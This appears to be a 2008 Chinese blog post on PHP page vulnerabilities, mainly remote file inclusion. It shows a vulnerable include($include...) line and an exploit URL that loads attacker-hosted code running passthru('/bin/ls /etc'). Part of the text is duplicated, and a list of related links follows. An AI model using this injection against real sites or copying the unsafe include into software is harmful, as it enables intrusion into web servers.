常见php页面漏洞分析及相关问题解决
2008-03-14 02:26
841 查看
从现在的网络安全来看,大家最关注和接触最多的web页面漏洞应该是asp了,在这方面,小竹是专家,我没发言权。然而在php方面来看,也同样存在很严重的安全问题,但是这方面的文章却不多。在这里,就跟大家来稍微的讨论一下php页面的相关漏洞吧。
我对目前常见的php漏洞做了一下总结,大致分为以下几种:包含文件漏洞,脚本命令执行漏洞,文件泄露漏洞,sql注入漏洞等几种。当然,至于cookie欺骗等一部分通用的技术就不在这里讨论了,这些资料网上也很多。那么,我们就一个一个来分析一下怎样利用这些漏洞吧!
首先,我们来讨论包含文件漏洞。这个漏洞应该说是php独有的吧。这是由于不充分处理外部提供的恶意数据,从而导致远程攻击者可以利用这些漏洞以web进程权限在系统上执行任意命令。我们来看一个例子:假设在a.php中有这样一句代码:
我对目前常见的php漏洞做了一下总结,大致分为以下几种:包含文件漏洞,脚本命令执行漏洞,文件泄露漏洞,sql注入漏洞等几种。当然,至于cookie欺骗等一部分通用的技术就不在这里讨论了,这些资料网上也很多。那么,我们就一个一个来分析一下怎样利用这些漏洞吧!
首先,我们来讨论包含文件漏洞。这个漏洞应该说是php独有的吧。这是由于不充分处理外部提供的恶意数据,从而导致远程攻击者可以利用这些漏洞以web进程权限在系统上执行任意命令。我们来看一个例子:假设在a.php中有这样一句代码:
以下是引用片段: include($include."/xxx.php"); ?>在这段代码中,$include一般是一个已经设置好的路径,但是我们可以通过自己构造一个路径来达到攻击的目的。比方说我们提交:a.php?include=http://web/b.php,这个web是我们用做攻击的空间,当然,b.php也就是我们用来攻击的代码了。我们可以在b.php中写入类似于:passthru("/bin/ls /etc");的代码。这样,就可以执行一些有目的的攻击了。(注:web服务器应该不能执行php代码,不然就出问题了。相关详情可以去看<<如何对php程序中的常见漏洞进行攻击>>)。在这个漏洞方面,出状况的很多,比方说:paypal store front,hotnews,mambo open source,phpdig,yabb se,phpbb,invisionboard,solmetra spaw editor,les visiteurs,phpgedview,x-cart等等一些。
相关文章推荐
- 常见PHP页面漏洞分析及相关问题解决
- 常见php页面漏洞分析及相关问题解决
- php页面漏洞分析及相关问题解决
- php中session_start()相关问题分析与解决办法
- php读取csv文件后,uft8 bom导致在页面上显示出现问题的解决方法
- 40条常见的移动端Web页面问题解决方案
- 40条常见的移动端Web页面问题解决方案
- PHP程序常见漏洞攻击分析
- (GPS移植三部曲)Linux下移植GPS应用程序之常见问题的分析与解决方法之二
- PHP调用存储过程返回值不一致问题的解决方法分析
- Ajax页面缓存问题分析与解决办法
- web安全扫描问题(常见的)分析以及解决方式
- 页面常见问题及解决办法
- php常见漏洞被攻击原因分析
- 微信小程序常见问题->上传文件后如何在后台(php)获取文件名解决方法
- 关于PHP页面显示乱码问题的解决
- 常见php与mysql中文乱码问题解决办法
- php中Y2K38的漏洞解决方法实例分析
- php中Y2K38的漏洞解决方法实例分析
- 常见WEB开发安全漏洞 原因分析及解决